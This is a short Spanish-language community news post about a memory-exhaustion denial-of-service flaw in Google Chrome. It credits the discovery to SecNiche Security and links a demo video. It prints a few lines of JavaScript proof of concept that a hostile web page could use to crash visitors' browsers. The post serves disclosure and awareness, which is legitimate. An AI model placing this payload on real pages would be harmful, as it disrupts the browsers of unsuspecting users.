Video demostrativo de Memory Exhaustion en Google Chrome

Una vez más el navegador desarrollado por Google, conocido como Chrome, presenta una vulnerabilidad facilmente explotable, esta vez se trata de Memory Exhaustation desde un servidor web remoto, provocando así una denegación de servicio.

Esta vulnerabilidad puede ser fácilmente explotada por un usuario malicioso que publique en su página web el siguiente código:

<script language="javascript">
window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");
</script>

Y esta web sea visitada utilizando Google Chrome.

El equipo de SecNiche Security son los responsables de este descubrimiento, y ofrecen una web como prueba de concepto

exactlimon, usuario de la comunidad y quién nos ha informado de esta noticia, se ha tomado la tarea de realizar un video demostrativo de la explotación de esta vulnerabilidad.

Descargar video demostrativo de Memory Exhaustation en Google Chrome

Articulo escrito por David Moreno (4v4t4r) para La Comunidad DragonJAR

David Moreno es Information Security Researcher con 10 años de experiencia en temáticas relacionadas con la Seguridad de la Información, Informática Forense, Ethical Hacking, Criptoanálisis y Análisis de Malware. Conferencista permanente en eventos nacionales e internacionales de seguridad informática

Es investigador especializado en la compañía DEFERO, donde realiza procedimientos avanzados en Test de Penetración, Identificación y Análisis de Vulnerabilidades, Investigaciones Forenses Digitales en conjunto con entidades del gobierno, analista de Malware y Criptoanálisis.

Subir